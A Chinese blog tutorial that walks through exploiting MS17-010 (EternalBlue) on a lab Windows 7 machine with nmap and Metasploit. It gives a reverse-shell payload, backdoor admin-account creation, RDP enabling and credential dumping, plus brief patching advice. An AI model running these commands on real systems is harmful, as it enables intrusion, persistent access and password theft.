MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法

已于 2024-08-22 16:06:55 修改
阅读量475 收藏 3
点赞数 12
文章标签: 网络 安全 网络安全 web安全
于 2024-08-22 16:05:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57163799/article/details/141430222
版权

目录

1.准备工作

2.漏洞扫描(二选一)

3.使用MSF(metasploit)工具

4.选择编码技术,用于绕过杀毒软件的查杀

5.远程控制

6.修复方法

7.扩充(查看Windows密码)

1.准备工作

  • 靶机:Windows 7(IP:192.168.237.129)
  • 攻击机:kali 2022(IP:192.168.237.130)
  • 工具:nmap(漏洞扫描)、metasploit(msf)

前提:两台主机需要在一个网段之下,能够相互ping通

2.漏洞扫描(二选一)

使用nmap的漏洞扫描程序

  • 扫描端口
sudo su     #切换root用户 
nmap -sS -sV 192.168.237.0/24     #扫描目标的IP段,查看上线主机

可以看到nmap扫到目标机192.168.237.129,操作系统是Windows7,同时开放了445端口,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。

  • 扫描常见漏洞
nmap --script=vuln 192.168.237.129 #使用vuln扫描常见的漏洞

可以发现,靶机上扫到了4个漏洞,其中包括了MS17-010。

3.使用MSF(metasploit)工具

msfconsole     #进入msf工具 
search ms17-010     #搜索漏洞编号为ms17-010的相关模块
  • 查询漏洞的相关模块

其中exploit是攻击模块,auxiliary是辅助模块。

4.选择编码技术,用于绕过杀毒软件的查杀

1.使用攻击模块use(模块序号)

use 0 #选用编号为0的模块 或use auxiliary/scanner/smb/smb_ms17_010

2.payload配置攻击载荷

set payload Windows/x64/meterpreter/reverse_tcp #配置攻击载荷并且使用反向连接

3.show options查看配置选项

show options #查看配置选项

4.set rhosts配置目标IP地址

set rhosts 192.168.237.129 #配置目标IP地址

5.set lhosts配置攻击者IP地址

set lhost 192.168.237.130 #配置攻击者IP地址

6.开始攻击

run #开始攻击 exploit #开始攻击

显示WIN则代表攻击成功

5.远程控制

1.获取目标机shell

shell     #拿到目标机shell

chcp 65001解决中文乱码问题

2.添加用户

net user admin 123456 /add     #net user 用户名 密码 /add 
net user                       #查看用户是否添加成功

用户添加成功!

3.权限提升

net localgroup administrators admin /add #权限提升到管理级别

4.开启远程桌面

netstat -ano #查看端口开启状态,主要是看3389
  • 如果没有3389端口,开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  • 开启远程连接

注意:此时需要再开一个命令行

rdesktop 192.168.237.129 #远程连接

可以使用remmina命令开启远程连接窗口:

6.修复方法

  • 关闭445端口
  • 安装对应补丁
  • 打开防火墙

7.扩充(查看Windows密码)

前提:已经进入meterpreter窗口

加载kiwi模块:

查看kiwi模块的使用:

creds_all:该命令可以列举系统中的明文密码(查看内存)

不想秃头的烟花
关注
  • 12
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的...
Art-is-Eternal-Happiness
03-15
"Art-is-Eternal-Happiness"这个项目标题可能暗示了开发者试图通过JavaScript技术来创造一种永恒的快乐体验,这可能是一个互动的艺术作品或者一个创新的网页应用。 JavaScript,又称为JS,是Web开发中的三大核心...
MS17-010---利用“永恒之蓝”漏洞攻击 win7主机
金灰的博客
04-29 1330
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
MS17-010(永恒之蓝)—漏洞复现及防范》
热门推荐
weixin_47118413的博客
04-10 1万+
通过Kali使用msfconsole在Win7复现MS17-010(永恒之蓝)漏洞以及如何防范。
MS17-010 永恒之蓝漏洞利用方式
weixin_51339377的博客
03-17 6782
Eternal blue永恒之蓝漏洞 windows操作系统漏洞 借助工具Metasploit复现漏洞 利用条件: 1.目标计算机开启445端口 2.一般适用计算机系统 windows7 或windows server2008 R2 攻击机器:kali-Linux 192.168.109.130 目标靶机:windows7 192.168.109.129 1.在黑客机器中对目标计算机进行端口的扫描 发现目标445端口处于开放状态 nmap -p 80,3...
MS17-010Eternal blue永恒之蓝)木马持久化+后渗透+修复
m0_73135216的博客
09-12 683
MS17-010Eternal blue永恒之蓝)木马持久化+后渗透+修复
MS17-010Eternal blue永恒之蓝)各模块利用
star1941761196的博客
06-20 1402
kali利用ms17-010漏洞
Metasploit -- MS17-010(永恒之蓝)漏洞利用
weixin_41489908的博客
05-14 1326
直到后来看到你恋爱的样子,才知道你从来没真正喜欢过我。。。。。 ---- 网易云热评 一、漏洞简介 MS17-010是一个安全类型的补丁,MS17-010更新修复了Microsoft Windows中的漏洞。 如果攻击者向Microsoft服务器消息块1.0(SMB v 1)服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 2017年, The Shadow Brokers决定公开一部分有价值的工具, 其中”eternal blue”(永恒之蓝) 就是其中之一(漏洞编号ms .
MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】
Shadow_DAI_990101的博客
08-31 896
永恒之蓝Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复确保防病毒软件是最新的。实施数据备份和恢复计划,将敏感或专有数据的副本保存在单独且安全的位置。...
MS17-010永恒之蓝)漏洞分析与复现
lulu001128的博客
12-01 1371
MS17-010Eternal blue永恒之蓝漏洞利用+修复方法
漏洞复现(一):永恒之蓝ms17-010
weixin_47306547的博客
11-02 6541
目录 永恒之蓝简介 SMB协议 SMB原理 漏洞原理 漏洞危害 漏洞复现 实验环境 完整过程 扫描目标主机是否存在该漏洞 实施攻击 漏洞利用 漏洞防御 永恒之蓝简介 永恒之蓝Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、...
cyber-eternal
04-16
我的目标不仅是建立编码,而且还提供相关且清晰的编码方法,以实现尽可能高效的编码系统,编写高性能代码,通过单元测试和集成测试来增加代码覆盖率,节省了时间和资源,以节省浪费,加快发布速度,努力工作,团队...
永恒的卡片插件「Eternal Card Plugin」-crx插件
03-12
查看并链接到您的浏览器中的永恒Warcry卡 一个浏览器,可在浏览各种网站时为粉丝创建永恒战争卡数据库链接,以制作永恒卡游戏。 当前包含的几个站点是RNGEternal.com和Reddit.com。 当将牌组列表悬停在鼠标上时,该...
【Linux网络】NAT技术
2301_79181030的博客
08-18 2362
当内部网络中的设备需要访问外部网络时,NAT设备会从公共IP地址池中分配一个公共IP地址给该设备,并建立映射关系。当内部网络中的设备需要访问外部网络时,NAT设备会将该设备的私有IP地址和端口号转换为一个公共IP地址和端口号,并将转换后的数据包发送至外部网络。外部网络返回的数据包经过NAT设备时,会被还原为原始的内部网络设备的私有IP地址和端口号,然后转发给内部网络设备。企业路由器通过NAT技术,将内部网络的私有IP地址转换为公共IP地址,以便员工能够远程访问企业内部资源。
《Cloud Native Data Center Networking》(云原生数据中心网络设计)读书笔记 -- 07数据中心的边缘
最新发布
梆子井欢喜坨的博客
08-21 333
本章将帮助你回答以下问题。
Modbus-TCP——Libmodbus安装和使用(Ubuntu22.04)
计算机硕士的博客
08-21 179
Modbus-TCP——Libmodbus安装和使用。
迈威通信Wi-Fi无线交换机:让工业网络打破线缆束缚
Maiwe的博客
08-16 664
为了满足日益增长的无线通信需求,迈威通信专门设计了一款MISCOM7209W-3N25系列二层网管型全千兆双频Wi-Fi卡轨式工业无线PoE交换机,旗下有4款产品,为智能制造和工业互联网的深度融合提供了坚实的网络基石。
ms17-010补丁
07-17
MS17-010是一个针对Microsoft Windows系统的安全补丁,它关注的是一个名为"永恒之蓝"(Eternal Blue)的漏洞。这个漏洞影响了Windows系统中的Server Message Block (SMB) 协议,黑客可以利用它远程攻击并执行恶意代码,尤其是通过网络共享资源。2017年4月,微软发布了此补丁,以修补这一高危漏洞,因为其可能导致大规模的勒索软件如WannaCry的爆发。安装这个补丁可以帮助保护计算机免受此类攻击,提高系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值